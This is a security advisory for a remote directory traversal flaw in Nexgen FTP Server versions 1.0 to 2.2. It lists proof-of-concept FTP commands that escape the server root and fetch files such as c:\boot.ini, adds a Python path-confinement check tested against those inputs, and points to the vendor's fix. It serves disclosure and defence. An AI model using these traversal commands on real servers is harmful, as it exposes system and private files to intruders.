NexGen FTP Server Remote Directory Traversal Vulnerability
BID:9970
Info
| Bugtraq ID: | 9970 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 24 2004 12:00AM |
| Updated: | Mar 24 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Ziv Kamir. |
| Vulnerable: | Nexgen FTP Server 2.2, Nexgen FTP Server 2.1, Nexgen FTP Server 2.0, Nexgen FTP Server 1.0 |
| Not Vulnerable: | |
Discussion
It has been reported that the Nexgen FTP server is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize file request strings from authenticated users.
Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information that may be used to launch further attacks against a vulnerable system.
Exploit / POC
No exploit is required to leverage this issue. The following proof of concept has been provided:
ls c:\*.*
ls ..
ls \..
ls /../
dir c:
dir \..\*.*
get c:\"Exist File" [ c:\boot.ini ]
get \..\"Exist File"
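An added example, not part of the original advisory or the vendor's code: a lexical path-confinement check of the kind the Discussion says was missing, run against the path arguments from the proof of concept above. `FTP_ROOT`, `resolve_ftp_path`, `PathRejected` and the benign sample paths are assumptions; `ntpath` is used so Windows path rules apply on any host.

```python
import ntpath  # Windows path rules, importable on any OS

FTP_ROOT = "C:\\ftproot"  # assumed root directory (not from the advisory)


class PathRejected(ValueError):
    """Client path resolves outside the FTP root."""


def resolve_ftp_path(arg, cwd="/", root=FTP_ROOT):
    """Return the path under root for a client argument, or raise.
    cwd is the session's virtual directory; "/" means the FTP root.
    Lexical check only: junctions/symlinks need a realpath step on the host.
    """
    if any(ord(ch) < 32 for ch in arg):
        raise PathRejected("control character in path")
    arg = arg.replace("/", "\\")
    drive, rest = ntpath.splitdrive(arg)
    if drive:  # "c:", "c:\boot.ini", "\\host\share\..."
        raise PathRejected("drive or UNC prefix not allowed")
    if not rest.startswith("\\"):  # relative: resolve against virtual cwd
        rest = cwd.replace("/", "\\") + "\\" + rest
    # Collapse "." and ".." first, then test containment on the result.
    candidate = ntpath.normpath(ntpath.join(root, rest.lstrip("\\")))
    base = ntpath.normcase(ntpath.normpath(root))
    cand = ntpath.normcase(candidate)
    if cand != base and not cand.startswith(base + "\\"):
        raise PathRejected("path escapes FTP root")
    return candidate


# Arguments taken from the proof of concept, plus constructed benign ones.
POC_ARGS = ["c:\\*.*", "..", "\\..", "/../", "c:", "\\..\\*.*", "c:\\boot.ini"]
BENIGN = [("pub/readme.txt", "/"), ("../docs/a.txt", "/pub"), ("/", "/pub")]


def audit():
    """Map each sample argument to its resolved path or 'REJECTED'."""
    out = {}
    for arg, cwd in [(a, "/") for a in POC_ARGS] + BENIGN:
        try:
            out[arg] = resolve_ftp_path(arg, cwd)
        except PathRejected:
            out[arg] = "REJECTED"
    return out


if __name__ == "__main__":
    for arg, result in audit().items():
        print(f"{arg!r:18} -> {result}")
```

The containment test compares against the root plus a trailing separator, so a sibling directory such as `C:\ftproot2` is not mistaken for a path inside `C:\ftproot`, and `..` is accepted when the collapsed result still lies under the root.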
Solution / Fix
Solution:
The vendor has supplied an upgrade to the affected software that deals with this issue.
Nexgen FTP Server 1.0
- NexGen NFTPS_Installer.exe: http://www.nexgenserver.com/downloads/NFTPS_Installer.exe
Nexgen FTP Server 2.0
- NexGen NFTPS_Installer.exe: http://www.nexgenserver.com/downloads/NFTPS_Installer.exe
Nexgen FTP Server 2.1
- NexGen NFTPS_Installer.exe: http://www.nexgenserver.com/downloads/NFTPS_Installer.exe
Nexgen FTP Server 2.2
- NexGen NFTPS_Installer.exe: http://www.nexgenserver.com/downloads/NFTPS_Installer.exe
References
- FTP Server Home Page (Nexgen)
- Nexgen Server 2.2 Update Available (NexGen)